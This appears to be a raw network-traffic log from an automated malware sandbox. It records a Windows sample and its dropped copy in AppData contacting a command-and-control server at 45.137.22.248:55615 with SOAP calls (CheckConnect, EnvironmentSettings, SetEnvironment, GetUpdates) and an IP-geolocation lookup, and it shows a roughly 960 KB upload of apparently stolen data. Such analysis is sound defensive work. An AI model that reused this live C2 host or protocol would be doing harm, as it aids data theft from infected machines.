                                                        Nov 4, 2024 04:32:25.697273970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697278976 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697298050 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697328091 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697427988 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697457075 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697464943 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697469950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697484970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697494030 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697503090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697511911 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697513103 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697530985 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697555065 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697556973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697582960 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697593927 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697619915 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697640896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697649956 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697659969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697709084 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697709084 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697720051 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697725058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697741032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697757006 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697767973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697783947 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697802067 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697802067 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697812080 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.705807924 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705816031 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705825090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705836058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705845118 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705852985 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705861092 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705869913 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705916882 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705925941 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705934048 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.705944061 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706047058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706056118 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706063986 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706073999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706082106 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706142902 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706154108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706161976 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706171036 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706180096 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706188917 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706197977 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706265926 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706275940 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706283092 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706293106 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706300974 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706310987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706319094 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706329107 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706337929 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706392050 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706402063 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706409931 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706418991 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706427097 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706435919 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706444025 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706482887 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706491947 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706501961 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706511021 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706518888 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706527948 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706536055 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706547022 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706563950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706574917 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706583023 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706592083 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706607103 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706615925 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706624031 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706631899 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706648111 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706657887 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706698895 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706707954 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706724882 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706733942 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706782103 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706790924 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706819057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706829071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706840038 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706895113 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706903934 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.706912041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707036018 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707045078 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707052946 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707062006 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707071066 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707087994 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707097054 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707106113 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707123041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707130909 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707164049 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707173109 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707201004 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707210064 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707217932 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707293987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707303047 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707309961 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707335949 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707345009 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707355022 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707364082 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707407951 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707417011 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707490921 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707500935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707516909 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707525969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707560062 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707623959 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707633972 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707643032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707709074 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707717896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707772970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707791090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707799911 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707809925 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707817078 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707910061 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707918882 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707926989 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707936049 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707945108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707953930 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707962990 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707972050 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707981110 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707988977 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708004951 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708014965 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708030939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708034992 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708091974 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708101034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708116055 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708123922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708180904 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708189964 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708218098 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708226919 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708267927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708276987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708286047 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708323002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708333969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708364010 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708373070 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708380938 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708395958 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708405018 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708535910 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708544970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708554983 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708564043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708570957 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708580971 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708589077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708597898 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708606005 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708614111 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708627939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708636999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708643913 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708652973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708662033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708668947 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708679914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708688974 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708776951 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708786011 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708794117 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708802938 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708811045 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708821058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708828926 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708837986 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708901882 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708910942 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708919048 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708928108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708935976 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708944082 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708951950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708961010 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708969116 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708977938 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709029913 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709039927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709048033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709057093 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709064960 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709074020 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709081888 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709090948 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709100008 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709108114 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709155083 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709163904 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709172010 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709182024 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709201097 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709281921 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709291935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709300995 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709372044 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709381104 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709422112 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709491968 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709613085 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709621906 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709638119 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709645987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709719896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709728956 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709774017 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709783077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709793091 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709870100 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709913969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709923029 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710084915 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710294008 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710460901 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710576057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710817099 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711013079 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711149931 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711348057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711549997 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711724043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.721792936 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:26.085789919 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:26.097728014 CET4983755615192.168.2.645.137.22.248
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2024 04:32:10.253213882 CET | 58974 | 53 | 192.168.2.6 | 1.1.1.1

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 04:32:10.253213882 CET | 192.168.2.6 | 1.1.1.1 | 0x6826 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 04:32:10.260335922 CET | 1.1.1.1 | 192.168.2.6 | 0x6826 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                        • 45.137.22.248:55615
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49718 | 45.137.22.248 | 55615 | 6724 | C:\Users\user\Desktop\I5pvP0CU6M.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 04:32:03.811441898 CET | 240 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Nov 4, 2024 04:32:04.621860027 CET | 359 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:03 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:09.769223928 CET | 223 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:10.039082050 CET | 1236 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 8064
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:08 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>139.186.206.86</b:string><b:string>112.244.133.106</b:string><b:string>113.100.145.59</b:string><b:string>14.19.28.125</b:string><b:string>36.143.61.93</b:string><b:string>120.229.169.226</b:string><b:string>27.214.63.21</b:string><b:string>125.94.23.107</b:string><b:string>114.95.213.233</b:string><b:string>219.137.198.172</b:string><b:string>84.57.190.182</b:string><b:string>113.78.94.204</b:string><b:string>125.123.233.96</b:string><b:string>113.68.110.168</b:string><b:string>172.174.62.166</b:string><b:string>103.149.33.156</b:string><b:string>121.226.48.220</b:string><b:string>14.221.49. [TRUNCATED]


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.6 | 49777 | 45.137.22.248 | 55615 | 6724 | C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 4, 2024 04:32:13.528331041 CET | 221 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 960380
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:15.493941069 CET | 294 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:14 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:15.497076988 CET | 217 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 960372
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:15.905955076 CET | 408 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:14 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.6 | 49784 | 45.137.22.248 | 55615 | 7568 | C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 4, 2024 04:32:14.330665112 CET | 240 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Nov 4, 2024 04:32:15.172902107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Nov 4, 2024 04:32:15.174155951 CET | 359 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:14 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:20.278641939 CET | 223 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:20.533976078 CET | 25 | IN | HTTP/1.1 100 Continue
